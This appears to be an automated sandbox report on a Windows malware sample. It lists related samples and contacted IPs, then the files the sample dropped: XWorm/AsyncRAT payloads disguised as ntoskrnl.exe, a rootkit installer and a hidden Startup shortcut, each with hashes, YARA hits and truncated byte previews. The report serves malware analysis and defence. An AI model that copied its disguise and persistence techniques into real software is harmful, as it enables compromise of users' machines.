                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                TUT-ASUS7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                boleto.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                taskhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                TRUSTPOWERLTD-AS-APTrustPowerLtdNZKrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 115.69.183.222
                                                                                                                                la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 139.180.112.101
                                                                                                                                357oRnNepg.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 14.137.171.2
                                                                                                                                HOHD9C7W11.elfGet hashmaliciousMoobotBrowse
                                                                                                                                • 116.251.148.249
                                                                                                                                v859oajfVH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 115.69.189.181
                                                                                                                                pandora.x86Get hashmaliciousMiraiBrowse
                                                                                                                                • 116.251.148.208
                                                                                                                                L1fzVJ2QwlGet hashmaliciousUnknownBrowse
                                                                                                                                • 139.180.79.19
                                                                                                                                z3hir.armGet hashmaliciousMiraiBrowse
                                                                                                                                • 139.180.79.43
                                                                                                                                notabotnet.armGet hashmaliciousMiraiBrowse
                                                                                                                                • 101.53.197.251
                                                                                                                                OlR2ldXttMGet hashmaliciousUnknownBrowse
                                                                                                                                • 101.53.215.29

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eFEDEX234598765.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                file.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                svhost.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                • 104.20.4.235

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\ProgramData\Install.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):165888
                                                                                                                                Entropy (8bit):7.815558274002771
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:eQpsbfyjozLuU7WzDvqu5faCaVKx9Hbsd8m8Z7f+BKA+YeufSMyoU+:eQpsbfyjoz5Aiu9wVKjHod5IfeXeuf7I
                                                                                                                                MD5:B5F6C9AC3389F5E61B4C750CF950E27C
                                                                                                                                SHA1:DBE0CCA47AB36938ED022311F97736FC2915FF06
                                                                                                                                SHA-256:BD4062E261A7AC5893E95A88D79564B44AAD58CA446C3649A50589415B64D098
                                                                                                                                SHA-512:014F187B94012F0A5077908107A7B0F3C7EFAE9EDF1A6EA7C395E387830E2FE84105A12EA8446311E0FC25FBE2790F56B614C9726507A22FEE7BAA46B2C4487C
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: C:\ProgramData\Install.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$........P.R.1...1...1.......1.......1...1...1..r....1..r....1...1u..1..r....1..Rich.1..................PE..L....k]g...............*.....x............... ....@.......................................@.................................D9..x....@..8V...........................8..8............................................ ...............................text............................... ..`.rdata..4.... ......................@..@.rsrc...8V...@...X..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\ProgramData\KrnlSetupSus.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):87040
                                                                                                                                Entropy (8bit):5.976836669615479
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:JyjBt6rjD8L0x+dykPoziDzbQcvxUu++6ZOF6g+NRKWi:J0H64IsMjIbQcZUdOsbNdi
                                                                                                                                MD5:6435792D63BE630506EB9EEBBD1E3878
                                                                                                                                SHA1:37F7023B735B3F8CD65803BC704AD529F896FF4A
                                                                                                                                SHA-256:DC4F64BA228C5D301A8D64BD8C172B45779583375D3C1BE3C83C3CD1C7D2A5E3
                                                                                                                                SHA-512:88AF5A007D8D21B057740F42EBEA3C4FE529924637B2C6B027ED520905EE8445F6B70D7A069457F82134E2C4405B0641F7620ADCCD8ABB1C2CA1DD62CD127955
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: ditekSHen
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.[g.................J...........i... ........@.. ....................................@.................................4i..W.................................................................................... ............... ..H............text....I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................pi......H........p..D.......&.....................................................(....*.r...p*. ...*..(....*.rm..p*. E/..*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. mh..*.r...p*. 6/..*.r...p*. ...*.r...p*. ~.H.*..((...*.r...p*. S...*.r...p*. ...*.(-...-.(....,.+.(/...,.+.(,...,.+.(+...,..(e...*"(....+.*&(,...&+.*.+5sr... .... .'..os...(,...~....-.(e...(W...~....ot...&.-.*.r+..p*. .(T.*.rG..p*.rc..p*. .x!.*.r...p*. O...*.r...p*.r...p*.r...p*.r...p*. ...*.r..

                                                                                                                                C:\ProgramData\ntoskrnl.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):87040
                                                                                                                                Entropy (8bit):5.976836669615479
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:JyjBt6rjD8L0x+dykPoziDzbQcvxUu++6ZOF6g+NRKWi:J0H64IsMjIbQcZUdOsbNdi
                                                                                                                                MD5:6435792D63BE630506EB9EEBBD1E3878
                                                                                                                                SHA1:37F7023B735B3F8CD65803BC704AD529F896FF4A
                                                                                                                                SHA-256:DC4F64BA228C5D301A8D64BD8C172B45779583375D3C1BE3C83C3CD1C7D2A5E3
                                                                                                                                SHA-512:88AF5A007D8D21B057740F42EBEA3C4FE529924637B2C6B027ED520905EE8445F6B70D7A069457F82134E2C4405B0641F7620ADCCD8ABB1C2CA1DD62CD127955
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ntoskrnl.exe, Author: ditekSHen
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.[g.................J...........i... ........@.. ....................................@.................................4i..W.................................................................................... ............... ..H............text....I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................pi......H........p..D.......&.....................................................(....*.r...p*. ...*..(....*.rm..p*. E/..*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. mh..*.r...p*. 6/..*.r...p*. ...*.r...p*. ~.H.*..((...*.r...p*. S...*.r...p*. ...*.(-...-.(....,.+.(/...,.+.(,...,.+.(+...,..(e...*"(....+.*&(,...&+.*.+5sr... .... .'..os...(,...~....-.(e...(W...~....ot...&.-.*.r+..p*. .(T.*.rG..p*.rc..p*. .x!.*.r...p*. O...*.r...p*.r...p*.r...p*.r...p*. ...*.r..

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RdLfpZY5A9.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
                                                                                                                                File Type:CSV text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):654
                                                                                                                                Entropy (8bit):5.380476433908377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                Malicious:true
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):11136
                                                                                                                                Entropy (8bit):7.977735047841484
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:SqzHGn8GpB3kqHOJwixL9LmSKa2rlMOr5ROdqyAyqs+49mcdGelsv8ZsdxE2Z7v:Sqzm8GpiCOJwid9qcKlMOr5RlyAS+49k
                                                                                                                                MD5:709904CF96EF7602A991D71596E3F4D4
                                                                                                                                SHA1:9B6075BEEA81F50A1DC9FA6A40311C534F61B9F3
                                                                                                                                SHA-256:F7305889D212C0F48719DA29AEBD40362388D07047A2A7C3AFB42BD932832C92
                                                                                                                                SHA-512:A5C901AE1A1BD6BA9EFFAE9C55A13AAB538CE186C6583AEDE62CFBF12AB43CEED6045A66AB4D6A222838718A1E9C5407F088EEB750B98C0497A5516C78B7645C
                                                                                                                                Malicious:false
                                                                                                                                Preview:....t+..................z..O.......$j/.j.C.h......... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ......jg.._q.=+|C.m..jD...+`...S>cw............ ...^.w).:...I..?...!..R`..&..4.e:p*..F>~.r......h%.x.l.....q.;...I"...../.(....e&.$|{..wM.b........,.bl1..:.r.....<..a. .........ioE.c..s..z.jz.hc...y..d.R..P.g...P....:..5..n 92...O..n-.q..k.<...a!z.q."..7..e.=s....1gP...........).....h.3..82 s.E^..%..,R.W...q.......h}.S.2..:L...Z...4N.\..........'o..v..?...@..........mz.j_.|w`.#..yM..*.....7..:.......-. .K.7.a..lrTa.s....wwWA.]..}......v.._........Y.....@}{..................z..&C...T..=$<v..H.../.[.s...q...9.(...}...L.dk)/N.MI.*x...`c{P....E....c}...oM.O^..G.U.z..S.:..4...M..~n*...04.......`...M..t.E....QJwv.t,O....g`C.z oC..,......%.* ......oO..guZ....%...}.H..G.%..%.w..}..={.oo7.....N..WZ..".<.....5.|.//...'......{W....;.y..H...Y~..G....a|.UX.X...<l....G.X.4:...:U.g.3p#...l.M;..O'.U.59O.O....e.0.....2.7Pr......7KM.....xX,i.a.."1..E..

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                                MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                                SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                                SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                                SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e.................................^..............@..........

                                                                                                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                File Type:Generic INItialization configuration [WIN]
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):58
                                                                                                                                Entropy (8bit):3.598349098128234
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                                                                                MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                                                                                SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                                                                                SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                                                                                SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                                                                                Malicious:false
                                                                                                                                Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1r3stjoo.ff1.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h25ft0p.2ye.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kp4xihr2.gtd.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndjm5qrp.kxq.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\2f6a24f9-6ad9-43e4-bf68-fccfdb1aa880

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):468
                                                                                                                                Entropy (8bit):6.378346510928039
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:gLn57s5d65jpFzooLjLSyXI6Y1m9lYUgx4Sn:MC5d65j7zoqiyXI6Y1m9lYUgiS
                                                                                                                                MD5:F88F8714D1209774BAEA02F7882EBEFF
                                                                                                                                SHA1:DB2095D3FD5D313D1A314C7E34BFF34CAAD3B4F5
                                                                                                                                SHA-256:1A7D47116AEB8B943597ABDE27F70C14EAB3F6E4B07D1971E7E764C3B0F95175
                                                                                                                                SHA-512:8355AD9F97CE1733EBAC4FCC42BDA3BD2E756031BBCFEC6D5F2FC52DDE4E56B86DDD93BE846D1A210E9EC79746E9BB166D05199E5F9C65FA03F2D4A36EA2D8D5
                                                                                                                                Malicious:false
                                                                                                                                Preview:............2.f.6.a.2.4.f.9.-.6.a.d.9.-.4.3.e.4.-.b.f.6.8.-.f.c.c.f.d.b.1.a.a.8.8.0....................................................._..cN....@........f...}...Q.}X.<.mR...UAO.^.9.R.....D.(..?Q...z3..b.PIPy......E.4K........G....lC.K:...}..2..._.n.m.c!:..F.\I..a>...V...F.....9.Z$..A.I_...6f.......U.r..+..X..1.@........f....>..;......w4^...;s.F....&...G...].....?.....OV.....v..G.$..5.Z.4.,....[..n.z.........C..a/j...x$..........K... ..M._.....n

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):24
                                                                                                                                Entropy (8bit):4.418295834054489
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:wy8O+Wwbn:w5Wwb
                                                                                                                                MD5:74ADEFF643805329350566353619BD26
                                                                                                                                SHA1:ECB5440BCDAB6EB93B434892B6903D1B2FB2BB1B
                                                                                                                                SHA-256:86ED647C4AA0BC6CEC1AA63D48C6198B7DF41B0E253ACE13B2FBBB88D30CFAF6
                                                                                                                                SHA-512:6CFBB3D200D623E861982AD32AFDAE64CCC985D07D9F9D0F53B894A38F6ECB5526FD5418D5514A645397215FDCD65E1578F0DF61201E9E58B3DD22A913341DC6
                                                                                                                                Malicious:false
                                                                                                                                Preview:.$j/.j.C.h...... .......

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 14 16:53:35 2024, mtime=Sat Dec 14 16:53:35 2024, atime=Sat Dec 14 16:53:35 2024, length=87040, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):670
                                                                                                                                Entropy (8bit):4.590831539421875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:8t0qppTsgcO8WRXlueXkNfTFjAY7NeD6bZdiE4hiE4fmV:8/lu1f1AseiZdEhEfm
                                                                                                                                MD5:BF08EF73994AC63AA6D165A27235C7DD
                                                                                                                                SHA1:532AD8716A98133A8EE2E32E010FC5187D8CEFF6
                                                                                                                                SHA-256:98C5B475A7203940731BA54A28FC3F5F9EAC838C908D6ADB51086CF89514A41E
                                                                                                                                SHA-512:2E0AFE0068B930457DDDADA04CE98044829E4E485F220187B31739188A3747EA1580777E38EFC3A243855B50E914B0872FB7C1D345B1041043E7FA252188A835
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F.... ..b8..QN..b8..QN..b8..QN...T...........................P.O. .:i.....+00.../C:\...................`.1......Y... PROGRA~3..H......O.I.Y......g.......................y.P.r.o.g.r.a.m.D.a.t.a.....f.2..T...Y.. ntoskrnl.exe..J......Y...Y.......)......................y.n.t.o.s.k.r.n.l...e.x.e.......J...............-.......I...........y..d.....C:\ProgramData\ntoskrnl.exe..3.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.n.t.o.s.k.r.n.l...e.x.e.`.......X.......098239...........hT..CrF.f4... .Q..LD....,...E...hT..CrF.f4... .Q..LD....,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):24
                                                                                                                                Entropy (8bit):4.584962500721156
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:LYULJpob:LYUkb
                                                                                                                                MD5:7C52D8173785B99E84F4B4208DE0BB10
                                                                                                                                SHA1:7657670549868E795CA46AA00B1AD544107777E1
                                                                                                                                SHA-256:60818BDD66DED9761220B0D939BE5CBFFCB7BC6F3702F58359F17A2D07822EF0
                                                                                                                                SHA-512:96E1807C8C78603669496A7BE4F663FDB0D454A3C04491429F30F987BD24209B2BD6578D36251E0109F93409E4A3DF639FC5F8F61FF5AE6109A57F0A8AC52C41
                                                                                                                                Malicious:false
                                                                                                                                Preview:.......O....MV.y......

                                                                                                                                C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\f71cdae7-f4f8-4fc8-ad0f-e18eef984d56

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):468
                                                                                                                                Entropy (8bit):6.1562693653639995
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:Ell88GBCygACZiIuNIZH9QZ/GXpQTODdctx5J4F+hmNND0XkpGP3wTg82S:iOCyg5iDNE9QZ/bTORc75WQyNJpG4Tz
                                                                                                                                MD5:466FC12525FB2A988E0242E5B7A3B32A
                                                                                                                                SHA1:41FBC0A655D533F7E90BA27DF9F08CA984052F5E
                                                                                                                                SHA-256:AF19996F362636819FA19D41D772C80C70AAAC5CC35CE7D46A163B3B975BC877
                                                                                                                                SHA-512:DCB5A00FA55C4F7ED20B30E6224FBCAFE17E1FA941680FDF8FF3FC72391D32A1070448066398832419C0246ACA1833D160722830628FD5676880CC57195DF5DF
                                                                                                                                Malicious:false
